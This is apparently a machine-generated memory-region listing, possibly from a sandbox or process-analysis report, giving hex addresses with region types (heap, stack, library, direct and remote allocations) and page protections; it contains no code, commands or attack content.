trusted library allocation
page read and write
B42A000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
AB60000
trusted library allocation
page read and write
4B10000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
5390000
direct allocation
page execute and read and write
CA14677000
stack
page read and write
8EE0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
2A3E000
heap
page read and write
BFA000
heap
page read and write
AB40000
trusted library allocation
page read and write
EF46FE000
stack
page read and write
72E1000
trusted library allocation
page read and write
13DB000
heap
page read and write
8CB5000
trusted library allocation
page read and write
260000
unkown
page readonly
14CD5865000
heap
page read and write
28EA53F0000
heap
page read and write
7DD5000
trusted library allocation
page read and write
90E0000
trusted library allocation
page read and write
37DAFFB000
stack
page read and write
8E30000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
1A330EC0000
trusted library allocation
page read and write
5602000
trusted library allocation
page read and write
3940000
heap
page read and write
87BB000
stack
page read and write
153A27B000
stack
page read and write
8DA0000
trusted library allocation
page read and write
7DC5000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
2230F400000
heap
page read and write
700000
direct allocation
page execute and read and write
19A000
stack
page read and write
6BF0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
72D7000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
1B54EDC0000
trusted library allocation
page read and write
4576000
trusted library allocation
page read and write
AB37000
trusted library allocation
page read and write
1B54EE63000
heap
page read and write
8E10000
trusted library allocation
page read and write
AD50000
trusted library allocation
page read and write
105F000
stack
page read and write
9004000
trusted library allocation
page read and write
1FA26E27000
heap
page read and write
283B000
stack
page read and write
2C87000
heap
page read and write
8ED0000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
A910000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
521B000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8F40000
trusted library allocation
page read and write
4D20000
direct allocation
page execute and read and write
9160000
unkown
page read and write
7F70000
direct allocation
page read and write
9C80000
trusted library allocation
page read and write
940000
heap
page read and write
734F000
trusted library allocation
page read and write
1A32B760000
trusted library section
page read and write
8090000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
8F70000
unkown
page read and write
7DC8000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
6C00000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
DED13FF000
stack
page read and write
FD0000
remote allocation
page read and write
7DC6000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
1B54EE13000
heap
page read and write
4C11000
heap
page read and write
2230F513000
heap
page read and write
6DA0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
4980000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
1A330C60000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
7F00000
trusted library allocation
page read and write
A8F0000
trusted library allocation
page read and write
455B000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
28DD5202000
heap
page read and write
8D80000
trusted library allocation
page read and write
90EA57F000
stack
page read and write
9010000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
1A32B813000
heap
page read and write
4530000
heap
page read and write
8EE0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
5481000
direct allocation
page read and write
8E10000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
2230F413000
heap
page read and write
B4C000
heap
page read and write
8CB0000
trusted library allocation
page read and write
14CD5864000
heap
page read and write
AF06000
trusted library allocation
page read and write
7DD5000
trusted library allocation
page read and write
73C0000
trusted library allocation
page read and write
A7E5CFD000
stack
page read and write
8E80000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
6E00000
trusted library allocation
page read and write
6C50000
trusted library allocation
page read and write
28EA5702000
heap
page read and write
9CB0000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
50A3000
trusted library allocation
page read and write
FEE000
stack
page read and write
125FCA4D000
heap
page read and write
8F30000
trusted library allocation
page read and write
9EF0000
trusted library allocation
page read and write
B390000
trusted library allocation
page read and write
8CB5000
trusted library allocation
page read and write
16717630000
heap
page read and write
1A330E34000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
35A0000
heap
page read and write
8E44000
trusted library allocation
page read and write
28DD5150000
trusted library allocation
page read and write
BF7000
heap
page read and write
8E10000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
C60000
remote allocation
page read and write
7DD0000
trusted library allocation
page read and write
B80000
heap
page read and write
AB10000
trusted library allocation
page read and write
29A5C23F000
heap
page read and write
6BE0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
1010000
trusted library allocation
page read and write
6AD000
stack
page read and write
8E80000
trusted library allocation
page read and write
1A32C910000
trusted library section
page readonly
BAD000
heap
page read and write
5510000
direct allocation
page read and write
8F10000
trusted library allocation
page read and write
1FA26E4C000
heap
page read and write
8D80000
trusted library allocation
page read and write
A4B000
heap
page read and write
51A000
unkown
page readonly
540000
remote allocation
page read and write
7DB0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
984000
heap
page read and write
6B70000
trusted library allocation
page read and write
29A5C213000
heap
page read and write
8E10000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5B76000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8DC0000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
55B1000
trusted library allocation
page read and write
8D10000
unkown
page read and write
9200000
trusted library allocation
page read and write
7DD5000
trusted library allocation
page read and write
94E000
heap
page read and write
8EB0000
unkown
page read and write
8E10000
trusted library allocation
page read and write
6B11000
direct allocation
page read and write
8D92000
trusted library allocation
page read and write
AE26000
trusted library allocation
page read and write
ACC6000
trusted library allocation
page read and write
28DD5200000
heap
page read and write
37DB87E000
stack
page read and write
8D80000
trusted library allocation
page read and write
8DD0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
1A32C118000
heap
page read and write
AB20000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
28EA56CB000
heap
page read and write
8E16000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
AB0000
heap
page read and write
7DC0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
B43C000
trusted library allocation
page read and write
8CB5000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
8CB6000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
2B6E000
stack
page read and write
8F70000
unkown
page read and write
8CB0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
2BB0000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
9090000
unkown
page read and write
7DC0000
unkown
page read and write
4C11000
heap
page read and write
4CB0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
6CD0000
trusted library allocation
page read and write
7DD5000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8E17000
trusted library allocation
page read and write
819C57F000
stack
page read and write
8DE0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
7DD5000
unkown
page read and write
B44000
heap
page read and write
8F68000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
6D4000
heap
page read and write
8E10000
trusted library allocation
page read and write
7F10000
unkown
page read and write
B80000
heap
page read and write
9000000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
A900000
trusted library allocation
page read and write
72B7000
trusted library allocation
page read and write
AB70000
trusted library allocation
page read and write
4616000
trusted library allocation
page read and write
4A7C000
stack
page read and write
8E10000
trusted library allocation
page read and write
6DC0000
trusted library allocation
page read and write
2230F488000
heap
page read and write
7DD0000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
6C40000
trusted library allocation
page read and write
8030000
direct allocation
page read and write
8E80000
trusted library allocation
page read and write
BF3000
heap
page read and write
55F3000
heap
page read and write
14CD587F000
heap
page read and write
8DE0000
trusted library allocation
page read and write
5B6D000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
55A4000
heap
page read and write
F90000
remote allocation
page read and write
7ED0000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
55B9000
trusted library allocation
page read and write
54E1000
heap
page read and write
AD70000
trusted library allocation
page execute and read and write
260000
unkown
page readonly
9CB0000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
1A32C113000
heap
page read and write
8D80000
trusted library allocation
page read and write
2340000
unkown
page read and write
34B0000
heap
page read and write
1FA26E7D000
heap
page read and write
9CB0000
trusted library allocation
page read and write
16717829000
heap
page read and write
9EE000
stack
page read and write
73A0000
trusted library allocation
page execute and read and write
9CA0000
trusted library allocation
page read and write
7BE000
stack
page read and write
14CD5870000
heap
page read and write
9C60000
trusted library allocation
page read and write
EF44FE000
stack
page read and write
7F00000
trusted library allocation
page read and write
6CB0000
trusted library allocation
page read and write
640000
trusted library allocation
page read and write
BE1000
heap
page read and write
8E80000
trusted library allocation
page read and write
A900000
trusted library allocation
page read and write
2CA3AC02000
trusted library allocation
page read and write
1B54EF18000
heap
page read and write
67E000
stack
page read and write
8E20000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
91A0000
unkown
page read and write
5627000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
B402000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
2230F42A000
heap
page read and write
470000
heap
page read and write
8DB0000
trusted library allocation
page read and write
4AC0000
heap
page execute and read and write
2C00000
direct allocation
page execute and read and write
4D03000
trusted library allocation
page read and write
9005000
trusted library allocation
page read and write
B3A1000
trusted library allocation
page read and write
9EF0000
trusted library allocation
page read and write
91D0000
trusted library allocation
page read and write
740000
heap
page read and write
C1D000
heap
page read and write
8D80000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
16717813000
heap
page read and write
4568000
trusted library allocation
page read and write
AB4C000
trusted library allocation
page read and write
25C1000
stack
page read and write
44F0000
unkown
page readonly
C11000
heap
page read and write
1A32C8C0000
trusted library section
page readonly
7D0000
direct allocation
page read and write
7DC0000
trusted library allocation
page read and write
AB90000
trusted library allocation
page read and write
8EB0000
unkown
page read and write
9CB0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
C20000
remote allocation
page read and write
2CA3A200000
heap
page read and write
8DE0000
trusted library allocation
page read and write
1A32B858000
heap
page read and write
9160000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
9CF1000
trusted library allocation
page read and write
7F20000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
6E54000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
E2E000
stack
page read and write
8E10000
trusted library allocation
page read and write
8CB5000
trusted library allocation
page read and write
6F50000
trusted library allocation
page read and write
1FA26E4E000
heap
page read and write
91C6000
trusted library allocation
page read and write
978000
heap
page read and write
7390000
trusted library allocation
page read and write
5B72000
trusted library allocation
page read and write
517000
unkown
page read and write
8D40000
unkown
page read and write
49B0000
trusted library allocation
page read and write
568A000
trusted library allocation
page read and write
29A5C200000
heap
page read and write
A930000
trusted library allocation
page read and write
99F000
stack
page read and write
4B50000
heap
page read and write
51B000
stack
page read and write
9030000
trusted library allocation
page read and write
A910000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
AF3000
heap
page read and write
8E10000
trusted library allocation
page read and write
7286000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
B8C000
heap
page read and write
AB20000
trusted library allocation
page read and write
4870000
unkown
page read and write
9C30000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
7DD5000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
4EE0000
heap
page read and write
9C50000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page read and write
A8AE000
stack
page read and write
8DE0000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
7DC5000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
C5EE6FE000
stack
page read and write
9CF000
stack
page read and write
FF9000
stack
page read and write
AB20000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
A930000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
8E7000
heap
page read and write
2F5A000
unkown
page readonly
16717902000
heap
page read and write
2AE0000
heap
page read and write
55E5000
heap
page read and write
4D8000
stack
page read and write
580000
remote allocation
page read and write
AB20000
trusted library allocation
page read and write
BFD000
heap
page read and write
7F10000
trusted library allocation
page read and write
C25000
heap
page read and write
7EF0000
unkown
page read and write
9010000
trusted library allocation
page read and write
6CF0000
trusted library allocation
page read and write
8E45000
trusted library allocation
page read and write
1B54EE5A000
heap
page read and write
9CE0000
trusted library allocation
page read and write
8CF0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
125FC840000
heap
page read and write
6B06000
direct allocation
page read and write
9000000
trusted library allocation
page read and write
1000000
trusted library section
page read and write
8E10000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
8DA5000
trusted library allocation
page read and write
72E1000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
6CE0000
trusted library allocation
page read and write
28EA56E8000
heap
page read and write
BF5000
heap
page read and write
8EC0000
trusted library allocation
page read and write
2A18000
heap
page read and write
8DE0000
trusted library allocation
page read and write
55DF000
heap
page read and write
8D80000
trusted library allocation
page read and write
359E000
stack
page read and write
8DA0000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
2CA3A302000
heap
page read and write
8ED0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
2A65000
heap
page read and write
1A32B8A1000
heap
page read and write
8EB0000
trusted library allocation
page read and write
49FE000
stack
page read and write
8CB0000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
EB5000
heap
page read and write
8E10000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
28EA5E02000
heap
page read and write
9C30000
trusted library allocation
page read and write
153A677000
stack
page read and write
9A3000
heap
page read and write
5FE000
stack
page read and write
8EA0000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
9CC7000
trusted library allocation
page read and write
5598000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
55A1000
heap
page read and write
9010000
trusted library allocation
page read and write
1B54ED30000
trusted library allocation
page read and write
51AA000
trusted library allocation
page read and write
73C0000
trusted library allocation
page read and write
CA1477F000
stack
page read and write
8CC0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
1A330E20000
trusted library allocation
page read and write
7DD5000
trusted library allocation
page read and write
14CD5862000
heap
page read and write
510000
heap
page read and write
7DC0000
trusted library allocation
page read and write
540000
remote allocation
page read and write
7DD0000
unkown
page read and write
A7E577B000
stack
page read and write
8E40000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
5E6FF000
unkown
page readonly
AB20000
trusted library allocation
page read and write
98D000
heap
page read and write
9EB0000
trusted library allocation
page read and write
AB40000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
5609000
heap
page read and write
9CB0000
trusted library allocation
page read and write
8CB0000
unkown
page read and write
28EA5550000
trusted library allocation
page read and write
FDD000
stack
page read and write
8ED0000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
51EC000
trusted library allocation
page read and write
13D0000
heap
page read and write
8E50000
trusted library allocation
page read and write
125FC8A0000
heap
page read and write
54F0000
direct allocation
page read and write
9CF0000
trusted library allocation
page read and write
F6C000
stack
page read and write
7ED0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
9C60000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
ABF0000
trusted library allocation
page read and write
7F48000
trusted library allocation
page read and write
90E9E7C000
stack
page read and write
B432000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
9005000
trusted library allocation
page read and write
5260000
trusted library allocation
page read and write
8FBE000
stack
page read and write
16717913000
heap
page read and write
8CF0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
48E000
stack
page read and write
DED0FFD000
stack
page read and write
9C60000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
1A331102000
heap
page read and write
9CA0000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
BB7000
heap
page read and write
686000
heap
page read and write
8F20000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
2F57000
unkown
page read and write
A8F0000
trusted library allocation
page read and write
6D4000
heap
page read and write
9CF0000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
90EA1FF000
stack
page read and write
B3D1000
trusted library allocation
page read and write
28EA5670000
heap
page read and write
2F70000
heap
page read and write
A910000
trusted library allocation
page read and write
153A37D000
stack
page read and write
8DE0000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
125FCA49000
heap
page read and write
34AF000
heap
page read and write
7F20000
trusted library allocation
page read and write
8E47000
trusted library allocation
page read and write
8CC5000
trusted library allocation
page read and write
29A5C202000
heap
page read and write
B398000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
ED9BDEE000
stack
page read and write
AB70000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
5578000
heap
page read and write
125FCB26000
heap
page read and write
B9A000
heap
page read and write
8DF0000
trusted library allocation
page read and write
1FA26C00000
heap
page read and write
73D0000
trusted library allocation
page read and write
A920000
trusted library allocation
page read and write
790000
remote allocation
page read and write
7DD0000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
72D2000
trusted library allocation
page read and write
7C0000
heap
page read and write
8E90000
unkown
page read and write
5609000
heap
page read and write
AB80000
trusted library allocation
page read and write
8CB7000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
C1D000
heap
page read and write
8DE3000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
AC50000
trusted library allocation
page read and write
16717790000
trusted library allocation
page read and write
9180000
trusted library allocation
page read and write
8EA4000
trusted library allocation
page read and write
AB25000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
8E57000
trusted library allocation
page read and write
7297000
trusted library allocation
page read and write
2230F47C000
heap
page read and write
8E40000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
540000
remote allocation
page read and write
ACB0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
52E0000
direct allocation
page execute and read and write
73C0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
AB15000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
4F0D000
stack
page read and write
9C70000
trusted library section
page read and write
8CB0000
trusted library allocation
page read and write
560D000
heap
page read and write
7380000
trusted library allocation
page read and write
44AE000
stack
page read and write
B45D000
trusted library allocation
page read and write
93B000
heap
page read and write
8F70000
trusted library allocation
page read and write
BFA000
heap
page read and write
8DE0000
trusted library allocation
page read and write
45AD000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
99B000
heap
page read and write
73E0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
BDA000
heap
page read and write
8E20000
trusted library allocation
page read and write
8CED000
trusted library allocation
page read and write
6B80000
trusted library allocation
page read and write
FD0D5FF000
stack
page read and write
7DC5000
trusted library allocation
page read and write
4380000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
4B9A000
trusted library allocation
page read and write
3240000
remote allocation
page read and write
BAC000
heap
page read and write
125FCA3C000
heap
page read and write
37DB97F000
stack
page read and write
6C0000
heap
page read and write
8E10000
trusted library allocation
page read and write
153A87D000
stack
page read and write
6D4000
heap
page read and write
8ED0000
trusted library allocation
page read and write
14CD5800000
heap
page read and write
7DC0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
CA1457B000
stack
page read and write
7DD0000
trusted library allocation
page read and write
7F40000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
8CB0000
unkown
page read and write
8CB0000
trusted library allocation
page read and write
9C70000
trusted library allocation
page read and write
1A330F50000
remote allocation
page read and write
4F8C000
stack
page read and write
8CD0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
B4C6000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
A7E5B7D000
stack
page read and write
51F5000
trusted library allocation
page read and write
5C50000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
7FB0000
direct allocation
page read and write
2230F461000
heap
page read and write
AC00000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
6C20000
trusted library allocation
page read and write
22ED000
stack
page read and write
9CB0000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
93BE000
unkown
page read and write
14CD5840000
heap
page read and write
8E40000
trusted library allocation
page read and write
BE8000
heap
page read and write
8F80000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
C5EE5FF000
stack
page read and write
8D97000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
897E000
stack
page read and write
9C0000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
90EA27F000
stack
page read and write
6CE0000
trusted library allocation
page read and write
630000
heap
page read and write
7020000
trusted library allocation
page read and write
1A330F10000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
750000
direct allocation
page read and write
7390000
trusted library allocation
page read and write
8DA0000
unkown
page read and write
73E0000
trusted library allocation
page read and write
8CE0000
unkown
page read and write
7FA70000
trusted library allocation
page execute and read and write
ACE0000
trusted library allocation
page read and write
984000
heap
page read and write
55F4000
heap
page read and write
AB80000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
93F000
heap
page read and write
BC5000
heap
page read and write
7DD9000
trusted library allocation
page read and write
125FCB00000
heap
page read and write
AB80000
trusted library allocation
page read and write
66A000
heap
page read and write
3448000
heap
page read and write
8DE0000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
4570000
trusted library allocation
page read and write
C1D000
heap
page read and write
8E10000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
4382000
unkown
page read and write
4AA0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8090000
unkown
page read and write
55F0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
1A331100000
heap
page read and write
8DA0000
trusted library allocation
page read and write
16717802000
heap
page read and write
7DD0000
trusted library allocation
page read and write
20000
heap
page read and write
8E00000
trusted library allocation
page read and write
6B90000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
6DF0000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
2CA3A120000
heap
page read and write
1375000
heap
page read and write
37DB47D000
stack
page read and write
1FA27602000
trusted library allocation
page read and write
8DA8000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
6BB0000
heap
page read and write
7DD0000
trusted library allocation
page read and write
232A000
stack
page read and write
1A330F20000
trusted library allocation
page read and write
93F000
heap
page read and write
9CB0000
trusted library allocation
page read and write
5C60000
trusted library allocation
page read and write
1B54EC30000
heap
page read and write
5570000
heap
page read and write
6C70000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
1A330F00000
trusted library allocation
page read and write
28EA5642000
heap
page read and write
8DA0000
trusted library allocation
page read and write
7FF0000
direct allocation
page read and write
AB30000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
5560000
heap
page read and write
9CB0000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
EF3FDE000
stack
page read and write
8E10000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
A8F0000
trusted library allocation
page read and write
73E0000
trusted library allocation
page read and write
2230F45E000
heap
page read and write
8CB0000
trusted library allocation
page read and write
2A53000
heap
page read and write
1370000
heap
page read and write
6B80000
trusted library allocation
page read and write
F90000
remote allocation
page read and write
7DC0000
trusted library allocation
page read and write
C0B000
heap
page read and write
6BF0000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
14CD5660000
heap
page read and write
8F32000
trusted library allocation
page read and write
B5C000
stack
page read and write
7DD0000
trusted library allocation
page read and write
790000
remote allocation
page read and write
AB10000
trusted library allocation
page read and write
341A000
heap
page read and write
8DF0000
trusted library allocation
page read and write
735C000
trusted library allocation
page read and write
8E15000
trusted library allocation
page read and write
7DD7000
unkown
page read and write
AB70000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
7DC5000
unkown
page read and write
6DB0000
heap
page execute and read and write
9010000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
4B61000
trusted library allocation
page read and write
6DD0000
trusted library allocation
page read and write
947E000
unkown
page read and write
7DC0000
trusted library allocation
page read and write
88FE000
stack
page read and write
9C90000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
54C000
stack
page read and write
14CD585F000
heap
page read and write
87FE000
stack
page read and write
FD0D6FF000
stack
page read and write
6F01000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
9CA8000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
B4E7000
trusted library allocation
page read and write
1A330E10000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
819CA7E000
stack
page read and write
8CC0000
unkown
page read and write
8ED0000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
ABE0000
trusted library allocation
page read and write
F2C000
stack
page read and write
5F9000
stack
page read and write
8E80000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
F90000
remote allocation
page read and write
6BE4000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
6DE0000
trusted library allocation
page read and write
153A2FE000
stack
page read and write
7FF4000
direct allocation
page read and write
C11000
heap
page read and write
9CE0000
trusted library allocation
page read and write
9C53000
trusted library allocation
page read and write
49FF000
stack
page read and write
9010000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
4E30000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
8F50000
trusted library section
page read and write
7F10000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
FD0D4FF000
stack
page read and write
91B0000
trusted library allocation
page read and write
4CEF000
stack
page read and write
8D90000
trusted library allocation
page read and write
29A5CA02000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
7080000
heap
page read and write
8DD0000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
1A330CD0000
trusted library allocation
page read and write
7D0000
remote allocation
page read and write
9CB0000
trusted library allocation
page read and write
5B30000
direct allocation
page execute and read and write
28EA56E2000
heap
page read and write
51A8000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
90EA17B000
stack
page read and write
50E0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
1FA26E3C000
heap
page read and write
9CB0000
trusted library allocation
page read and write
4A3E000
stack
page read and write
6CE3000
